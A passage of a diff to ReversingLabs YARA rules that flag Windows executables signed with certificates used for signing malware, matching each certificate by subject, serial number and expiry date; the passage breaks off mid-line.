"https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L16690-L16706" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "75e3dfd593d7fdc268de54430be617c015957a624f2ca36bc0036d4cbde5b686" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L10824-L10842" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "cde89ae5b77ff6833fe642bdd74e81763ef068e31c07e7881906e4e4a5939942" score = 75 quality = 90 tags = "INFO, FILE" @@ -23237,22 +43028,22 @@ rule REVERSINGLABS_Cert_Blocklist_0619C5E39A4Fc60A32F9B07F6A4Ca328 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Yuanyuan Zhang" and pe.signatures[i].serial=="06:19:c5:e3:9a:4f:c6:0a:32:f9:b0:7f:6a:4c:a3:28" and 1475884800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "FORWARD MUSIC AGENCY SRL" and (pe.signatures[i].serial=="00:df:25:47:b2:ca:b5:68:9a:81:d6:1d:e8:0e:aa:a3:a2" or pe.signatures[i].serial=="df:25:47:b2:ca:b5:68:9a:81:d6:1d:e8:0e:aa:a3:a2") and 1657756800<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_2Bffef48E6A321B418041310Fdb9B0D0 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_28B691272719B1Ee : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "6a29551f-8359-5394-9acd-00c3b25d7064" + id = "8f1d125a-de0f-525b-8dac-702bc123cc53" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L16708-L16724" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "30a079b55b75b292f7af4f5ae99184cbb3cca1ce4cf20f2f5c961b533673db00" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L10844-L10860" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "0bd973f415b7cfa0858c705c4486da9f181c7259af01d1cff486fb6b8e8e775b" score = 75 quality = 90 tags = "INFO, FILE" @@ -23262,22 +43053,22 @@ rule REVERSINGLABS_Cert_Blocklist_2Bffef48E6A321B418041310Fdb9B0D0 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "A&D DOMUS LIMITED" and pe.signatures[i].serial=="2b:ff:ef:48:e6:a3:21:b4:18:04:13:10:fd:b9:b0:d0" and 1554681600<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "2021945 Ontario Inc." and pe.signatures[i].serial=="28:b6:91:27:27:19:b1:ee" and 1616410532<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_34Ec9565805F34204C6966Fb81E36Ba1 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_1C897216E58E83Cbe74Ad03284E1Fb82 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "bd032608-8622-5c7a-a3a7-808d73e611d7" + id = "8805805d-312d-5bd4-94da-c18270ac26bf" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L16726-L16742" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "e434a02f5b9b22a25d8fe7a0bb7bd81b1cd8bc5356b4b626e3bfceb3f554a085" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L10862-L10878" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "6b3b2708d3a442fa6425e60ae900c94fc22fbfdb47f290ff56e9d349d99fd85f" score = 75 quality = 90 tags = "INFO, FILE" @@ -23287,22 +43078,22 @@ rule REVERSINGLABS_Cert_Blocklist_34Ec9565805F34204C6966Fb81E36Ba1 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Xin Zhou" and pe.signatures[i].serial=="34:ec:95:65:80:5f:34:20:4c:69:66:fb:81:e3:6b:a1" and 1476921600<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "M-Trans Maciej Caban" and pe.signatures[i].serial=="1c:89:72:16:e5:8e:83:cb:e7:4a:d0:32:84:e1:fb:82" and 1639119705<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_B2B934B7F01E0Ac1E577814992243709 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_5A364C4957D93406F76321C2316F42F0 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "19930e7b-09cb-5c04-b838-3d8d73ba194b" + id = "49e36ae5-25f0-5e1d-82f0-c7ada2b4d914" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L16744-L16762" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "37b254ab76d144c09cc7b622dba59f5e372bf01ae12ce260a06143abb52062f6" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L10880-L10896" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "fe3a2b906debb3f03e6a403829fca02c751754e9a02442a962c66defb84aed83" score = 75 quality = 90 tags = "INFO, FILE" @@ -23312,22 +43103,22 @@ rule REVERSINGLABS_Cert_Blocklist_B2B934B7F01E0Ac1E577814992243709 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "MS CORP SOFTWARE LTD" and (pe.signatures[i].serial=="00:b2:b9:34:b7:f0:1e:0a:c1:e5:77:81:49:92:24:37:09" or pe.signatures[i].serial=="b2:b9:34:b7:f0:1e:0a:c1:e5:77:81:49:92:24:37:09") and 1590710400<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Board Game Bucket Ltd" and pe.signatures[i].serial=="5a:36:4c:49:57:d9:34:06:f7:63:21:c2:31:6f:42:f0" and 1661337307<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_3A1B397Fd9451E3B5891Fc69681Ed73D : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_E7E7F7180666546Ce7A8Da32119F5Ce1 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "6bdba43f-4003-5807-9adc-20691fbc8d14" + id = "8984ac03-2646-54a1-a6d3-4c2cc72806e7" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L16764-L16780" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "ca43c7bacd8cb5a896c3135abf4a131bdb4a7f5093e64c8d1df743fad0c1c64a" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L10898-L10916" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "940f6508208998593f309ffeeeda20ab475d427c952a14871b6e58e17d2a4c85" score = 75 quality = 90 tags = "INFO, FILE" @@ -23337,22 +43128,22 @@ rule REVERSINGLABS_Cert_Blocklist_3A1B397Fd9451E3B5891Fc69681Ed73D : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Yongli Zhang" and pe.signatures[i].serial=="3a:1b:39:7f:d9:45:1e:3b:58:91:fc:69:68:1e:d7:3d" and 1470614400<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "C\\xC3\\x94NG TY TNHH PDF SOFTWARE" and (pe.signatures[i].serial=="00:e7:e7:f7:18:06:66:54:6c:e7:a8:da:32:11:9f:5c:e1" or pe.signatures[i].serial=="e7:e7:f7:18:06:66:54:6c:e7:a8:da:32:11:9f:5c:e1") and 1661558399<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_1Eb816Aa49E4894D9E9F78729E53Cd48 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_062B2827500C5Df35A83F661B3Af5Dd3 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "d2e66765-bdf6-59ff-ac6c-1a82ecefa731" + id = "784c58d9-9a13-5402-867e-c1b144512957" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L16782-L16798" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "4e22568612aec050c7f78b81ba6749528a9c25c0ba43e14260a581a9bea7a2f0" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L10918-L10934" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "4edc263b08b21428b5f2f4f14f9582c0f96f79cb49fbba563c103bf8bb2037a6" score = 75 quality = 90 tags = "INFO, FILE" @@ -23362,22 +43153,22 @@ rule REVERSINGLABS_Cert_Blocklist_1Eb816Aa49E4894D9E9F78729E53Cd48 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "\\xE5\\x96\\x84\\xE5\\x90\\x9B \\xE9\\x9F\\xA6" and pe.signatures[i].serial=="1e:b8:16:aa:49:e4:89:4d:9e:9f:78:72:9e:53:cd:48" and 1429056000<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "*.eos.com" and pe.signatures[i].serial=="06:2b:28:27:50:0c:5d:f3:5a:83:f6:61:b3:af:5d:d3" and 1651449600<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_383Ca88D6D9379C740609560 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_7Bf27695Fd20B588F2B2F173B6Caf2Ba : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "46166e9e-515d-530a-a651-59821d979f01" + id = "a3e6923a-f2c4-5d7c-aeab-bdb7fe03c597" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L16800-L16816" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "ce41d046a7ca320d034fa226b5e8c22022cc6bfc97eb9ef294b1aca232aaacef" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L10936-L10952" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "94d8739761b6a8ee91550be47432b046609b076aab6e57996de123a0fcaba73e" score = 75 quality = 90 tags = "INFO, FILE" @@ -23387,22 +43178,22 @@ rule REVERSINGLABS_Cert_Blocklist_383Ca88D6D9379C740609560 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures[i].serial=="38:3c:a8:8d:6d:93:79:c7:40:60:95:60" and 1478250214<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Game Warriors Limited" and pe.signatures[i].serial=="7b:f2:76:95:fd:20:b5:88:f2:b2:f1:73:b6:ca:f2:ba" and 1662112800<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_6731Cb1430F18B8C0C43Ab40E1154169 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_1B248C8508042D36Bbd5D92D189C61D8 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "df2423da-37ec-5adc-8497-2ac975b0b7ff" + id = "4ad05207-10d1-53c5-8383-a3c71a447ed6" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L16818-L16834" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "c05349166919ffc18ac6ecb61b822a8365f87a82164c5e110ef94345bdc4de6f" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L10954-L10970" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "2c063d0878a8bf6cd637e1dac2cb9164beb52c951e01858a7c3c9c4c1a853f54" score = 75 quality = 90 tags = "INFO, FILE" @@ -23412,22 +43203,22 @@ rule REVERSINGLABS_Cert_Blocklist_6731Cb1430F18B8C0C43Ab40E1154169 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "3 AM CHP" and pe.signatures[i].serial=="67:31:cb:14:30:f1:8b:8c:0c:43:ab:40:e1:15:41:69" and 1436313600<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Digital Robin Limited" and pe.signatures[i].serial=="1b:24:8c:85:08:04:2d:36:bb:d5:d9:2d:18:9c:61:d8" and 1663171218<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_159505E6456B9A9352F7C47168D89B96 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_032660Ee1D49Ad35086027473E2614E5E724 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "3d078c5d-e469-54f1-bd69-aebeec1c25f1" + id = "29cb9255-0a34-58e8-88b2-fad988c7d229" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L16836-L16852" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "d6d0d5c86dd88afa29fb3c7cc3c0ab2e3401637a23e062ee9bab693a715cf16f" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L10972-L10988" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "8d1435d2fa70db12cde2f9098e35ca1737f5aac36bac91329b28f03aad090e90" score = 75 quality = 90 tags = "INFO, FILE" @@ -23437,22 +43228,22 @@ rule REVERSINGLABS_Cert_Blocklist_159505E6456B9A9352F7C47168D89B96 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Shan Feng" and pe.signatures[i].serial=="15:95:05:e6:45:6b:9a:93:52:f7:c4:71:68:d8:9b:96" and 1469404800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "sunshine.com" and pe.signatures[i].serial=="03:26:60:ee:1d:49:ad:35:08:60:27:47:3e:26:14:e5:e7:24" and 1660238245<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_04A0E92B0B9Ebbb797Df6Ef52Bd5Ad05 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_043052956E1E6Dbd5F6Ae3D8B82Cad2A2Ed8 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "c6ba359e-4883-534d-bc86-8c063e54c92f" + id = "ac09f8ac-fbdd-5989-a7e7-07373a69213b" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L16854-L16870" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "ff2a2d06c48bd3426fa42526d966152e3e7166c4170b4e08bb65ee5d876eda93" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L10990-L11006" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "c29fb109c741437a3739f1c42aadace8f612ef1e3ea90e3e2bdd8a92c85e766a" score = 75 quality = 90 tags = "INFO, FILE" @@ -23462,22 +43253,22 @@ rule REVERSINGLABS_Cert_Blocklist_04A0E92B0B9Ebbb797Df6Ef52Bd5Ad05 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Beijing Caiyunshidai Technology Co., Ltd." and pe.signatures[i].serial=="04:a0:e9:2b:0b:9e:bb:b7:97:df:6e:f5:2b:d5:ad:05" and 1479081600<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "ok.com" and pe.signatures[i].serial=="04:30:52:95:6e:1e:6d:bd:5f:6a:e3:d8:b8:2c:ad:2a:2e:d8" and 1662149613<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_25F222Ab2613Dc4270B2Aabc2519A101 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_Dbc03Ca7E6Ae6Db6 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "4458df2d-82c2-5377-9746-101c2de52913" + id = "a5ac5da6-0bb0-5327-ac3a-b53d2f103fe6" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L16872-L16888" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "2c6673f6821c4ba11fc015cf3e9edefeb7c45209bc9dcd18501c4681444a9b9e" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L11008-L11026" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "0077b9c46ddd98a4929878ba4ba9476ed7fb1d7bf6e30c3ae0f950445d01e8f3" score = 75 quality = 90 tags = "INFO, FILE" @@ -23487,22 +43278,22 @@ rule REVERSINGLABS_Cert_Blocklist_25F222Ab2613Dc4270B2Aabc2519A101 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Aeroscan TOV" and pe.signatures[i].serial=="25:f2:22:ab:26:13:dc:42:70:b2:aa:bc:25:19:a1:01" and 1445299200<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "SPIDER DEVELOPMENTS PTY LTD" and (pe.signatures[i].serial=="00:db:c0:3c:a7:e6:ae:6d:b6" or pe.signatures[i].serial=="db:c0:3c:a7:e6:ae:6d:b6") and 1600826873<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_212Ca239866F88C3D5B000B3004A569C : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_7D27332C3Cb3A382A4Fd232C5C66A2 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "b433cddc-25c3-5627-99b5-ff9bc7fa73ed" + id = "d8390528-ff27-514d-ab89-fd563a19ce3c" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L16890-L16906" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "23ab2343b17dce74fb4166a690ca5dd300b3ed20d3a6b43b922f456410d3035d" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L11028-L11044" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "c1c50015db7f97b530819b40e2578463a6021bfff8e2582858a4c3fbd1a9b9bc" score = 75 quality = 90 tags = "INFO, FILE" @@ -23512,22 +43303,22 @@ rule REVERSINGLABS_Cert_Blocklist_212Ca239866F88C3D5B000B3004A569C : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "XECURE LAB CO., LTD." and pe.signatures[i].serial=="21:2c:a2:39:86:6f:88:c3:d5:b0:00:b3:00:4a:56:9c" and 1347840000<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "MALVINA RECRUITMENT LIMITED" and pe.signatures[i].serial=="7d:27:33:2c:3c:b3:a3:82:a4:fd:23:2c:5c:66:a2" and 1655424000<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_18B700A319Aa98Ae71B279D4E8030B82 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_82D224323Efa65060B641F51Fadfef02 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "8d1a98aa-a895-5e79-905c-760166352d4f" + id = "166949cf-dbff-5713-950e-46d1f3edc61f" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L16908-L16924" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "e201498acfd9afebc68321887a806bb5c1d74c64a7cd93530feae2a944bd30fa" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L11046-L11064" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "9d361c91ed24b6c20a7b35957e26f208ce8e0a3d79c5a6fed6278acd826ccf49" score = 75 quality = 90 tags = "INFO, FILE" @@ -23537,22 +43328,22 @@ rule REVERSINGLABS_Cert_Blocklist_18B700A319Aa98Ae71B279D4E8030B82 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Yu Bao" and pe.signatures[i].serial=="18:b7:00:a3:19:aa:98:ae:71:b2:79:d4:e8:03:0b:82" and 1479686400<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "SAVAS INVESTMENTS PTY LTD" and (pe.signatures[i].serial=="00:82:d2:24:32:3e:fa:65:06:0b:64:1f:51:fa:df:ef:02" or pe.signatures[i].serial=="82:d2:24:32:3e:fa:65:06:0b:64:1f:51:fa:df:ef:02") and 1665100800<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_169138A86954Be1D9B264F47 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_890570B6B0E2868A53Be3F8F904A88Ee : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "56653f72-39af-50e7-9908-e516f9b21084" + id = "681d233c-d5a2-5f25-bdb9-125149a291c4" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L16926-L16942" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "1584e39b4e2025611bcb7bbbd92b97d25d12ddbb1e5c282db87730a03f7f56b1" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L11066-L11084" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "fb7af8ec09da2fecaaaed8c7770966f11ef8a44a131553a9d1412387db2fb7ea" score = 75 quality = 90 tags = "INFO, FILE" @@ -23562,22 +43353,22 @@ rule REVERSINGLABS_Cert_Blocklist_169138A86954Be1D9B264F47 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "BIG JOURNEY TECHNOLOGY LIMITED" and pe.signatures[i].serial=="16:91:38:a8:69:54:be:1d:9b:26:4f:47" and 1477636474<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "JESEN LESS d.o.o." and (pe.signatures[i].serial=="00:89:05:70:b6:b0:e2:86:8a:53:be:3f:8f:90:4a:88:ee" or pe.signatures[i].serial=="89:05:70:b6:b0:e2:86:8a:53:be:3f:8f:90:4a:88:ee") and 1636588800<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_33412168Eeb3C0E4C7Dd0508A9Ffecd5 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_2642Fe865F7566Ce3123A5142C207094 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "db2ae33e-d3af-5200-ad15-824e29434e2c" + id = "508d9c00-c209-55b2-9a40-b62ff4d866c9" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = 